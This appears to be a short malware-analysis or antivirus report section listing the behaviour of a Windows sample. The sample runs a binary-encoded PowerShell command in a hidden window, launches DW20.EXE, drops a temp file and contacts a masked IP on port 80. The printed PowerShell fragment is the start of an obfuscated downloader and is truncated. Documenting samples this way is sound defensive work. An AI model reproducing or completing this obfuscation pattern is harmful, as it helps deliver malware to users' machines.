Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1189788.cvr
- '19#.#3.213.37':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111...' (with hidden window)